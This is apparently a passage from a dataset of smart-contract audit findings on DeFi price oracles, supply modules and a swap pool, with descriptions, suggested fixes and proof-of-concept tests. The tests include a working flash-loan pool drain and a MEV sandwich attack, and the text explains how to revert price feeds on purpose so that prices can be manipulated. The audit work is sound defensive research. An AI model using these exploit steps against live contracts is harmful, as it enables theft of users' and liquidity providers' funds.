{\\n uint256 pricesLen = prices_.length;\\n\\n // If there are an even number of prices, return the average of the two middle prices\\n if (pricesLen % 2 == 0) {\\n uint256 middlePrice1 = prices_[pricesLen / 2 - 1];\\n uint256 middlePrice2 = prices_[pricesLen / 2];\\n return (middlePrice1 + middlePrice2) / 2;\\n }\\n\\n // Otherwise return the median price\\n // Don't need to subtract 1 from pricesLen to get midpoint index\\n // since integer division will round down\\n return prices_[pricesLen / 2];\\n }\\n```\\n\\nAs you can see, the median value can be calculated from two values. 
This problem exists at `getMedianPrice` function as well.\\n```\\n function getMedianPrice(uint256[] memory prices_, bytes memory) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n uint256 nonZeroPricesLen = nonZeroPrices.length;\\n // Can only calculate a median if there are 3+ non-zero prices\\n if (nonZeroPricesLen == 0) return 0;\\n if (nonZeroPricesLen < 3) return nonZeroPrices[0];\\n\\n // Sort the prices\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n return _getMedianPrice(sortedPrices);\\n }\\n```\\n
First, `SimplePriceFeedStrategy.sol#getMedianPriceIfDeviation` function has to be rewritten as follows.\\n```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted in place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are not enough non-zero prices to calculate a median, return the first non-zero price\\n- if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n+ if (nonZeroPrices.length < 2) return firstNonZeroPrice;\\n\\n // rest of code\\n }\\n```\\n\\nSecond, `SimplePriceFeedStrategy.sol#getMedianPrice` has to be modified as following.\\n```\\n function getMedianPrice(uint256[] memory prices_, bytes memory) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n uint256 nonZeroPricesLen = nonZeroPrices.length;\\n // Can only calculate a median if there are 3+ non-zero prices\\n if (nonZeroPricesLen == 0) return 0;\\n- if (nonZeroPricesLen < 3) return nonZeroPrices[0];\\n+ if (nonZeroPricesLen < 2) return nonZeroPrices[0];\\n\\n // Sort the prices\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n return _getMedianPrice(sortedPrices);\\n }\\n```\\n
When the length of `nonZeroPrices` is 2 and the values deviate, it returns the first non-zero value instead of the median value. This causes an incorrect price calculation.
```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n237 uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted in place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are not enough non-zero prices to calculate a median, return the first non-zero price\\n246 if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n // Get the average and median and abort if there's a problem\\n // The following two values are guaranteed to not be 0 since sortedPrices only contains non-zero values and has a length of 3+\\n uint256 averagePrice = _getAveragePrice(sortedPrices);\\n253 uint256 medianPrice = _getMedianPrice(sortedPrices);\\n\\n if (params_.length != DEVIATION_PARAMS_LENGTH) revert SimpleStrategy_ParamsInvalid(params_);\\n uint256 deviationBps = abi.decode(params_, (uint256));\\n if (deviationBps <= DEVIATION_MIN || deviationBps >= DEVIATION_MAX)\\n revert SimpleStrategy_ParamsInvalid(params_);\\n\\n // Check the deviation of the minimum from the average\\n uint256 minPrice = sortedPrices[0];\\n262 if (((averagePrice - minPrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Check the deviation of the maximum from the average\\n uint256 maxPrice = sortedPrices[sortedPrices.length - 1];\\n266 if (((maxPrice - averagePrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Otherwise, return the first non-zero value\\n return firstNonZeroPrice;\\n }\\n```\\n
Price calculation can be manipulated by intentionally reverting some of the price feeds.
medium
Price calculation module iterates through available price feeds for the requested asset, gather prices of non-revert price feeds and then apply strategy on available prices to calculate final asset price. By abusing this functionality, an attacker can let some price feeds revert to get advantage from any manipulated price feed.\\nHere we have some methods that attackers can abuse to intentionally revert price feeds.\\nUniswapV3 price feed UniswapV3Price.sol#L210-214\\n```\\n// Get the current price of the lookup token in terms of the quote token\\n(, int24 currentTick, , , , , bool unlocked) = params.pool.slot0();\\n\\n// Check for re-entrancy\\nif (unlocked == false) revert UniswapV3_PoolReentrancy(address(params.pool));\\n```\\n\\nIn UniswapV3 price feed, it reverts if current state is re-entered. An attacker can intentionally revert this price feed by calling it from UniswapV3's callback methods.\\nBalancer price feed BalancerPoolTokenPrice.sol#L388 BalancerPoolTokenPrice.sol#487 BalancerPoolTokenPrice.sol#599 BalancerPoolTokenPrice.sol#748\\n```\\n// Prevent re-entrancy attacks\\nVaultReentrancyLib.ensureNotInVaultContext(balVault);\\n```\\n\\nIn BalancerPool price feed, it reverts if current state is re-entered. An attacker can intentionally revert this price feed by calling it in the middle of Balancer action.\\nBunniToken price feed BunniPirce.sol#L155-160\\n```\\n_validateReserves(\\n _getBunniKey(token),\\n lens,\\n params.twapMaxDeviationsBps,\\n params.twapObservationWindow\\n);\\n```\\n\\nIn BunniToken price feed, it validates reserves and reverts if it doesn't satisfy deviation. Since BunniToken uses UniswapV3, this can be intentionally reverted by calling it from UniswapV3's mint callback.\\n\\nUsually for ERC20 token prices, above 3 price feeds are commonly used combined with Chainlink price feed, and optionally with `averageMovingPrice`. There are another two points to consider here:\\nWhen average moving price is used, it is appended at the end of the price array. OlympusPrice.v2.sol#L160\\n```\\nif (asset.useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n```\\n\\nIn price calculation strategy, first non-zero price is used when there are 2 valid prices: `getMedianPriceIfDeviation` - SimplePriceFeedStrategy.sol#L246 `getMedianPrice` - SimplePriceFeedStrategy.sol#L313 For `getAveragePrice` and `getAveragePriceIfDeviation`, it uses average price if it deviates.\\n\\nBased on the information above, here are potential attack vectors that attackers would try:\\nWhen Chainlink price feed is manipulated, an attacker can disable all three above price feeds intentionally to get advantage of the price manipulation.\\nWhen Chainlink price feed is not used for an asset, an attacker can manipulate one of above 3 spot price feeds and disable other ones.\\nWhen `averageMovingPrice` is used and average price strategy is applied, the manipulation effect becomes half: $\\frac{(P + \\Delta X) + (P)}{2} = P + \\frac{\\Delta X}{2}, P=Market Price, \\Delta X=Manipulated Amount$
For the cases above where price feeds can be intentionally reverted, the price calculation itself should also revert instead of silently ignoring the failed feed.
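A minimal sketch of a feed query that reverts instead of leaving a failed feed at zero; the error name and the standalone helper are assumptions, while the selector-based staticcall mirrors the pattern used in `_getCurrentPrice`:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\ncontract FeedCheckSketch {\\n    error PRICE_FeedFailed(address submodule, bytes4 selector);\\n\\n    function _queryFeed(\\n        address submodule,\\n        bytes4 selector,\\n        bytes memory params\\n    ) internal view returns (uint256) {\\n        (bool success, bytes memory data) = submodule.staticcall(\\n            abi.encodeWithSelector(selector, params)\\n        );\\n        // Revert instead of silently recording a zero price for this feed\\n        if (!success) revert PRICE_FeedFailed(submodule, selector);\\n        return abi.decode(data, (uint256));\\n    }\\n}\\n```\\n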
Attackers can easily disable selected price feeds at will, allowing them to take advantage of a single manipulated price feed.
```\\n// Get the current price of the lookup token in terms of the quote token\\n(, int24 currentTick, , , , , bool unlocked) = params.pool.slot0();\\n\\n// Check for re-entrancy\\nif (unlocked == false) revert UniswapV3_PoolReentrancy(address(params.pool));\\n```\\n
getReservesByCategory() will revert when useSubmodules = true and submoduleReservesSelector = bytes4(0)
medium
In `getReservesByCategory()`, the lack of a check that `data.submoduleReservesSelector != ""` before calling `submodule.staticcall(abi.encodeWithSelector(data.submoduleReservesSelector));` causes a revert.\\nIn `_addCategory()`, when `useSubmodules == true`, `submoduleMetricSelector` must not be empty, but `submoduleReservesSelector` may be empty (bytes4(0)),\\nas with "protocol-owned-treasury":\\n```\\n _addCategory(toCategory("protocol-owned-treasury"), true, 0xb600c5e2, 0x00000000); // getProtocolOwnedTreasuryOhm()`\\n```\\n\\nHowever, when `getReservesByCategory()` is called, it does not check `submoduleReservesSelector != bytes4(0)` and directly calls `submoduleReservesSelector`:\\n```\\n function getReservesByCategory(\\n Category category_\\n ) external view override returns (Reserves[] memory) {\\n// rest of code\\n // If category requires data from submodules, count all submodules and their sources.\\n len = (data.useSubmodules) ? submodules.length : 0;\\n\\n// rest of code\\n\\n for (uint256 i; i < len; ) {\\n address submodule = address(_getSubmoduleIfInstalled(submodules[i]));\\n (bool success, bytes memory returnData) = submodule.staticcall(\\n abi.encodeWithSelector(data.submoduleReservesSelector)\\n );\\n```\\n\\nAs a result, a call such as `getReservesByCategory(toCategory("protocol-owned-treasury"))` will revert.\\nPOC\\nAdd to `SUPPLY.v1.t.sol`:\\n```\\n function test_getReservesByCategory_includesSubmodules_treasury() public {\\n _setUpSubmodules();\\n\\n // Add OHM/gOHM in the treasury (which will not be included)\\n ohm.mint(address(treasuryAddress), 100e9);\\n gohm.mint(address(treasuryAddress), 1e18); // 1 gOHM\\n\\n // Categories already defined\\n\\n uint256 expectedBptDai = BPT_BALANCE.mulDiv(\\n BALANCER_POOL_DAI_BALANCE,\\n BALANCER_POOL_TOTAL_SUPPLY\\n );\\n uint256 expectedBptOhm = BPT_BALANCE.mulDiv(\\n BALANCER_POOL_OHM_BALANCE,\\n BALANCER_POOL_TOTAL_SUPPLY\\n );\\n\\n // Check reserves\\n SPPLYv1.Reserves[] memory reserves = moduleSupply.getReservesByCategory(\\n toCategory("protocol-owned-treasury")\\n );\\n }\\n```\\n\\n```\\n forge test -vv --match-test test_getReservesByCategory_includesSubmodules_treasury\\n\\nRunning 1 test for src/test/modules/SPPLY/SPPLY.v1.t.sol:SupplyTest\\n[FAIL. Reason: SPPLY_SubmoduleFailed(0xeb502B1d35e975321B21cCE0E8890d20a7Eb289d, 0x0000000000000000000000000000000000000000000000000000000000000000)] test_getReservesByCategory_includesSubmodules_treasury() (gas: 4774197\\n```\\n
```\\n function getReservesByCategory(\\n Category category_\\n ) external view override returns (Reserves[] memory) {\\n// rest of code\\n\\n\\n CategoryData memory data = categoryData[category_];\\n uint256 categorySubmodSources;\\n // If category requires data from submodules, count all submodules and their sources.\\n// Remove the line below\\n len = (data.useSubmodules) ? submodules.length : 0;\\n// Add the line below\\n len = (data.useSubmodules && data.submoduleReservesSelector!=bytes4(0)) ? submodules.length : 0;\\n```\\n
Some categories cannot return their `Reserves`.
```\\n _addCategory(toCategory("protocol-owned-treasury"), true, 0xb600c5e2, 0x00000000); // getProtocolOwnedTreasuryOhm()`\\n```\\n
Balancer LP valuation methodologies use the incorrect supply metric
medium
In various Balancer LP valuations, totalSupply() is used to determine the total LP supply. However, this is not the appropriate method for determining the supply; getActualSupply should be used instead. Depending on the pool implementation and how much LP is deployed, the valuation can be much too high or too low. Since the RBS pricing is dependent on this metric, it could lead to RBS being deployed at incorrect prices.\\nAuraBalancerSupply.sol#L345-L362\\n```\\nuint256 balTotalSupply = pool.balancerPool.totalSupply();\\nuint256[] memory balances = new uint256[](_vaultTokens.length);\\n// Calculate the proportion of the pool balances owned by the polManager\\nif (balTotalSupply != 0) {\\n // Calculate the amount of OHM in the pool owned by the polManager\\n // We have to iterate through the tokens array to find the index of OHM\\n uint256 tokenLen = _vaultTokens.length;\\n for (uint256 i; i < tokenLen; ) {\\n uint256 balance = _vaultBalances[i];\\n uint256 polBalance = (balance * balBalance) / balTotalSupply;\\n\\n\\n balances[i] = polBalance;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nTo value each LP token, the contract divides the valuation of the pool by the total supply of LP. This in itself is correct; however, the totalSupply method for a variety of Balancer pools doesn't accurately reflect the true LP supply. If we take a look at a few Balancer pools we can quickly see the issue:\\nThis pool shows a max supply of 2,596,148,429,273,858 whereas the actual supply is 6454.48. In this case the LP token would be significantly undervalued. If a sizable portion of the reserves is deployed in an affected pool, the backing per OHM would appear to the RBS system to be much lower than it really is. As a result it can cause the RBS to deploy its funding incorrectly, potentially selling/buying at a large loss to the protocol.
Use a try-catch block to always query getActualSupply on each pool to make sure supported pools use the correct metric.
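A minimal sketch of that fallback, assuming a pool interface exposing both functions (getActualSupply() exists on newer Balancer pools such as ComposableStablePool; older pools will hit the catch branch):\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\ninterface IBalancerPoolLike {\\n    function totalSupply() external view returns (uint256);\\n    function getActualSupply() external view returns (uint256);\\n}\\n\\ncontract SupplySketch {\\n    function lpSupply(IBalancerPoolLike pool) internal view returns (uint256) {\\n        try pool.getActualSupply() returns (uint256 actualSupply) {\\n            return actualSupply;\\n        } catch {\\n            // Pool does not implement getActualSupply(); fall back to totalSupply()\\n            return pool.totalSupply();\\n        }\\n    }\\n}\\n```\\n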
Pool LP can be grossly under- or over-valued.
```\\nuint256 balTotalSupply = pool.balancerPool.totalSupply();\\nuint256[] memory balances = new uint256[](_vaultTokens.length);\\n// Calculate the proportion of the pool balances owned by the polManager\\nif (balTotalSupply != 0) {\\n // Calculate the amount of OHM in the pool owned by the polManager\\n // We have to iterate through the tokens array to find the index of OHM\\n uint256 tokenLen = _vaultTokens.length;\\n for (uint256 i; i < tokenLen; ) {\\n uint256 balance = _vaultBalances[i];\\n uint256 polBalance = (balance * balBalance) / balTotalSupply;\\n\\n\\n balances[i] = polBalance;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n
Possible incorrect price for tokens in Balancer stable pool due to amplification parameter update
medium
Incorrect price calculation of tokens in StablePools if the amplification factor is being updated\\nThe amplification parameter used to calculate the invariant can be in a state of update. In such a case, the current amplification parameter can differ from the amplification parameter at the time of the last invariant calculation. The current implementation of `getTokenPriceFromStablePool` doesn't consider this and always uses the amplification factor obtained by calling `getLastInvariant`.\\n```\\n function getTokenPriceFromStablePool(\\n address lookupToken_,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n\\n // rest of code..\\n\\n try pool.getLastInvariant() returns (uint256, uint256 ampFactor) {\\n \\n // @audit the amplification factor as of the last invariant calculation is used\\n lookupTokensPerDestinationToken = StableMath._calcOutGivenIn(\\n ampFactor,\\n balances_,\\n destinationTokenIndex,\\n lookupTokenIndex,\\n 1e18,\\n StableMath._calculateInvariant(ampFactor, balances_) // Sometimes the fetched invariant value does not work, so calculate it\\n );\\n```\\n\\n```\\n // @audit the amplification parameter can be updated\\n function startAmplificationParameterUpdate(uint256 rawEndValue, uint256 endTime) external authenticate {\\n\\n // @audit for calculating the invariant the current amplification factor is obtained by calling _getAmplificationParameter()\\n function _onSwapGivenIn(\\n SwapRequest memory swapRequest,\\n uint256[] memory balances,\\n uint256 indexIn,\\n uint256 indexOut\\n ) internal virtual override whenNotPaused returns (uint256) {\\n (uint256 currentAmp, ) = _getAmplificationParameter();\\n uint256 amountOut = StableMath._calcOutGivenIn(currentAmp, balances, indexIn, indexOut, swapRequest.amount);\\n return amountOut;\\n }\\n```\\n
Use the latest amplification factor by calling the `getAmplificationParameter` function
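A minimal sketch of fetching the live value; the three-value return of getAmplificationParameter() matches Balancer's stable pools, but the exact signature should be treated as an assumption to verify against the target pool:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\ninterface IStablePoolLike {\\n    function getAmplificationParameter()\\n        external\\n        view\\n        returns (uint256 value, bool isUpdating, uint256 precision);\\n}\\n\\ncontract AmpSketch {\\n    function currentAmpFactor(IStablePoolLike pool) internal view returns (uint256) {\\n        (uint256 value, , ) = pool.getAmplificationParameter();\\n        // Use the live (possibly mid-update) value with StableMath instead of the\\n        // ampFactor cached by getLastInvariant()\\n        return value;\\n    }\\n}\\n```\\n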
If the amplification parameter of a pool is being updated by the admin, an incorrect price will be calculated.
```\\n function getTokenPriceFromStablePool(\\n address lookupToken_,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n\\n // rest of code..\\n\\n try pool.getLastInvariant() returns (uint256, uint256 ampFactor) {\\n \\n // @audit the amplification factor as of the last invariant calculation is used\\n lookupTokensPerDestinationToken = StableMath._calcOutGivenIn(\\n ampFactor,\\n balances_,\\n destinationTokenIndex,\\n lookupTokenIndex,\\n 1e18,\\n StableMath._calculateInvariant(ampFactor, balances_) // Sometimes the fetched invariant value does not work, so calculate it\\n );\\n```\\n
Incorrect deviation calculation in isDeviatingWithBpsCheck function
medium
The current implementation of the `isDeviatingWithBpsCheck` function in the codebase leads to inaccurate deviation calculations, potentially allowing deviations beyond the specified limits.\\nThe function `isDeviatingWithBpsCheck` checks if the deviation between two values exceeds a defined threshold. This function incorrectly calculates the deviation, considering only the deviation from the larger value to the smaller one, instead of the deviation from the mean (or TWAP).\\n```\\n function isDeviatingWithBpsCheck(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n if (deviationBps_ > deviationMax_)\\n revert Deviation_InvalidDeviationBps(deviationBps_, deviationMax_);\\n\\n return isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n\\n function isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return\\n (value0_ < value1_)\\n ? _isDeviating(value1_, value0_, deviationBps_, deviationMax_)\\n : _isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n```\\n\\nThe function then call `_isDeviating` to calculate how much the smaller value is deviated from the bigger value.\\n```\\n function _isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return ((value0_ - value1_) * deviationMax_) / value0_ > deviationBps_;\\n }\\n```\\n\\nThe function `isDeviatingWithBpsCheck` is usually used to check how much the current value is deviated from the TWAP value to make sure that the value is not manipulated. Such as spot price and twap price in UniswapV3.\\n```\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n baseInQuotePrice,\\n baseInQuoteTWAP,\\n params.maxDeviationBps,\\n DEVIATION_BASE\\n )\\n ) {\\n revert UniswapV3_PriceMismatch(address(params.pool), baseInQuoteTWAP, baseInQuotePrice);\\n }\\n```\\n\\nThe issue is isDeviatingWithBpsCheck is not check the deviation of current value to the TWAP but deviation from the bigger value to the smaller value. This leads to an incorrect allowance range for the price, permitting deviations that exceed the acceptable threshold.\\nExample:\\nTWAP price: 1000 Allow deviation: 10%.\\nThe correct deviation calculation will use deviation from the mean. The allow price will be from 900 to 1100 since:\\n|1100 - 1000| / 1000 = 10%\\n|900 - 1000| / 1000 = 10%\\nHowever the current calculation will allow the price from 900 to 1111\\n(1111 - 1000) / 1111 = 10%\\n(1000 - 900) / 1000 = 10%\\nEven though the actual deviation of 1111 to 1000 is |1111 - 1000| / 1000 = 11.11% > 10%
To accurately measure deviation, the isDeviating function should be revised to calculate the deviation based on the mean value: `| spot value - twap value | / twap value`.
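A minimal sketch of that change, measuring the deviation of the spot value relative to the TWAP value rather than relative to whichever value happens to be larger:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nlibrary DeviationSketch {\\n    function isDeviating(\\n        uint256 spotValue,\\n        uint256 twapValue,\\n        uint256 deviationBps,\\n        uint256 deviationMax\\n    ) internal pure returns (bool) {\\n        uint256 diff = spotValue > twapValue ? spotValue - twapValue : twapValue - spotValue;\\n        // |spot - twap| * deviationMax / twap > deviationBps\\n        return (diff * deviationMax) / twapValue > deviationBps;\\n    }\\n}\\n```\\n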
This miscalculation allows for greater deviations than intended, increasing the vulnerability to price manipulation and inaccuracies in Oracle price reporting.
```\\n function isDeviatingWithBpsCheck(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n if (deviationBps_ > deviationMax_)\\n revert Deviation_InvalidDeviationBps(deviationBps_, deviationMax_);\\n\\n return isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n\\n function isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return\\n (value0_ < value1_)\\n ? _isDeviating(value1_, value0_, deviationBps_, deviationMax_)\\n : _isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n```\\n
Pool can be drained if there are no LP_FEES
high
The pool can be depleted because swaps allow the withdrawal of the entire balance, resulting in a reserve of 0 for a specific asset. When an asset's balance reaches 0, the PMMPricing algorithm incorrectly estimates the calculation of output amounts. Consequently, the entire pool can be exploited using a flash loan by depleting one of the tokens to 0 and then swapping back to the pool whatever is received.\\nFirstly, as indicated in the summary, selling quote/base tokens can lead to draining the opposite token in the pool, potentially resulting in a reserve of 0. Consequently, the swapping mechanism permits someone to entirely deplete the token balance within the pool. In such cases, the calculations within the pool mechanism become inaccurate. Therefore, swapping back to whatever has been initially purchased will result in acquiring more tokens, further exacerbating the depletion of the pool.\\nAllow me to provide a PoC to illustrate this scenario:\\n```\\nfunction test_poolCanBeDrained() public {\\n // @review 99959990000000000000000 this amount makes the reserve 0\\n // run a fuzz test, to get the logs easily I will just use this value as constant but I found it via fuzzing\\n // selling this amount to the pool will make the quote token reserves "0".\\n vm.startPrank(tapir);\\n uint256 _amount = 99959990000000000000000;\\n\\n // Buy shares with tapir, 10 - 10 initiate the pool\\n dai.transfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // make sure the values are correct with my math\\n assertTrue(gsp._BASE_RESERVE_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_RESERVE_() == 10 * 1e6);\\n assertTrue(gsp._BASE_TARGET_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_TARGET_() == 10 * 1e6);\\n assertEq(gsp.balanceOf(tapir), 10 * 1e18);\\n vm.stopPrank();\\n \\n // sell such a base token amount such that the quote reserve is 0\\n // I calculated the "_amount" already which will make the quote token reserve "0"\\n vm.startPrank(hippo);\\n deal(DAI, hippo, _amount);\\n dai.transfer(address(gsp), _amount);\\n uint256 receivedQuoteAmount = gsp.sellBase(hippo);\\n\\n // print the reserves and the amount received by hippo when he sold the base tokens\\n console.log("Received quote amount by hippo", receivedQuoteAmount);\\n console.log("Base reserve", gsp._BASE_RESERVE_());\\n console.log("Quote reserve", gsp._QUOTE_RESERVE_());\\n\\n // Quote reserve is 0!!! That means the pool has 0 assets, basically pool has only one asset now!\\n // this behaviour is almost always not a desired behaviour because we never want our assets to be 0 \\n // as a result of swapping or removing liquidity.\\n assertEq(gsp._QUOTE_RESERVE_(), 0);\\n\\n // sell the quote tokens received back to the pool immediately\\n usdc.transfer(address(gsp), receivedQuoteAmount);\\n\\n // cache whatever received base tokens from the selling back\\n uint256 receivedBaseAmount = gsp.sellQuote(hippo);\\n\\n console.log("Received base amount by hippo", receivedBaseAmount);\\n console.log("Base target", gsp._BASE_TARGET_());\\n console.log("Quote target", gsp._QUOTE_TARGET_());\\n console.log("Base reserve", gsp._BASE_RESERVE_());\\n console.log("Quote reserve", gsp._QUOTE_RESERVE_());\\n \\n // whatever received in base tokens are bigger than our first flashloan! \\n // means that we have a profit!\\n assertGe(receivedBaseAmount, _amount);\\n console.log("Profit for attack", receivedBaseAmount - _amount);\\n }\\n```\\n\\nTest results and logs:
Do not allow the pool's reserves to reach 0, and do not allow LP_FEE to be 0 at any time.
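A minimal sketch of a post-swap guard along those lines; the reserve variable names follow the finding, while the error name and placement are assumptions:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\ncontract ReserveGuardSketch {\\n    error ReserveDepleted();\\n\\n    uint112 internal _BASE_RESERVE_;\\n    uint112 internal _QUOTE_RESERVE_;\\n\\n    // Call at the end of sellBase/sellQuote after the reserves have been synced\\n    function _checkReservesNonZero() internal view {\\n        if (_BASE_RESERVE_ == 0 || _QUOTE_RESERVE_ == 0) revert ReserveDepleted();\\n    }\\n}\\n```\\n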
Pool can be drained, funds are lost. Hence, high. Though, this can only happen when there are no "LP_FEES". However, when we check the default settings of the deployment, we see here that the LP_FEE is set to 0. So, it is ok to assume that the LP_FEES can be 0.
```\\nfunction test_poolCanBeDrained() public {\\n // @review 99959990000000000000000 this amount makes the reserve 0\\n // run a fuzz test, to get the logs easily I will just use this value as constant but I found it via fuzzing\\n // selling this amount to the pool will make the quote token reserves "0".\\n vm.startPrank(tapir);\\n uint256 _amount = 99959990000000000000000;\\n\\n // Buy shares with tapir, 10 - 10 initiate the pool\\n dai.transfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // make sure the values are correct with my math\\n assertTrue(gsp._BASE_RESERVE_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_RESERVE_() == 10 * 1e6);\\n assertTrue(gsp._BASE_TARGET_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_TARGET_() == 10 * 1e6);\\n assertEq(gsp.balanceOf(tapir), 10 * 1e18);\\n vm.stopPrank();\\n \\n // sell such a base token amount such that the quote reserve is 0\\n // I calculated the "_amount" already which will make the quote token reserve "0"\\n vm.startPrank(hippo);\\n deal(DAI, hippo, _amount);\\n dai.transfer(address(gsp), _amount);\\n uint256 receivedQuoteAmount = gsp.sellBase(hippo);\\n\\n // print the reserves and the amount received by hippo when he sold the base tokens\\n console.log("Received quote amount by hippo", receivedQuoteAmount);\\n console.log("Base reserve", gsp._BASE_RESERVE_());\\n console.log("Quote reserve", gsp._QUOTE_RESERVE_());\\n\\n // Quote reserve is 0!!! That means the pool has 0 assets, basically pool has only one asset now!\\n // this behaviour is almost always not a desired behaviour because we never want our assets to be 0 \\n // as a result of swapping or removing liquidity.\\n assertEq(gsp._QUOTE_RESERVE_(), 0);\\n\\n // sell the quote tokens received back to the pool immediately\\n usdc.transfer(address(gsp), receivedQuoteAmount);\\n\\n // cache whatever received base tokens from the selling back\\n uint256 receivedBaseAmount = gsp.sellQuote(hippo);\\n\\n console.log("Received base amount by hippo", receivedBaseAmount);\\n console.log("Base target", gsp._BASE_TARGET_());\\n console.log("Quote target", gsp._QUOTE_TARGET_());\\n console.log("Base reserve", gsp._BASE_RESERVE_());\\n console.log("Quote reserve", gsp._QUOTE_RESERVE_());\\n \\n // whatever received in base tokens are bigger than our first flashloan! \\n // means that we have a profit!\\n assertGe(receivedBaseAmount, _amount);\\n console.log("Profit for attack", receivedBaseAmount - _amount);\\n }\\n```\\n
Adjusting "_I_" will create a sandwich opportunity because of price changes
medium
Adjusting the value of "I" directly influences the price. This can be exploited by a MEV bot, simply by trading just before the "adjustPrice" function and exiting right after the price change. The profit gained from this operation essentially represents potential losses for the liquidity providers who supplied liquidity to the pool.\\nAs we can see in the docs, the "I" is the "i" value in here and it is directly related with the output amount a trader will receive when selling a quote/base token:\\nSince the price will change, the MEV bot can simply sandwich the tx. Here an example how it can be executed by a MEV bot:\\n```\\nfunction test_Adjusting_I_CanBeFrontrunned() external {\\n vm.startPrank(tapir);\\n\\n // Buy shares with tapir, 10 - 10\\n dai.safeTransfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // print some stuff\\n console.log("Base target initial", gsp._BASE_TARGET_());\\n console.log("Quote target initial", gsp._QUOTE_TARGET_());\\n console.log("Base reserve initial", gsp._BASE_RESERVE_());\\n console.log("Quote reserve initial", gsp._QUOTE_RESERVE_());\\n \\n // we know the price will decrease so lets sell the base token before that\\n uint256 initialBaseTokensSwapped = 5 * 1e18;\\n\\n // sell the base tokens before adjustPrice\\n dai.safeTransfer(address(gsp), initialBaseTokensSwapped);\\n uint256 receivedQuoteTokens = gsp.sellBase(tapir);\\n vm.stopPrank();\\n\\n // this is the tx will be sandwiched by the MEV trader\\n vm.prank(MAINTAINER);\\n gsp.adjustPrice(999000);\\n\\n // quickly resell whatever gained by the price update\\n vm.startPrank(tapir);\\n usdc.safeTransfer(address(gsp), receivedQuoteTokens);\\n uint256 receivedBaseTokens = gsp.sellQuote(tapir);\\n console.log("Base target", gsp._BASE_TARGET_());\\n console.log("Quote target", gsp._QUOTE_TARGET_());\\n console.log("Base reserve", gsp._BASE_RESERVE_());\\n console.log("Quote reserve", gsp._QUOTE_RESERVE_());\\n console.log("Received base tokens", receivedBaseTokens);\\n\\n // NOTE: the LP fee and MT FEE is set for this example, so this is not an rough assumption\\n // where fees are 0. Here the fees set for both of the values (default values):\\n // uint256 constant LP_FEE_RATE = 10000000000000;\\n // uint256 constant MT_FEE_RATE = 10000000000000;\\n\\n // whatever we get is more than we started, in this example\\n // MEV trader started 5 DAI and we have more than 5 DAI!!\\n assertGe(receivedBaseTokens, 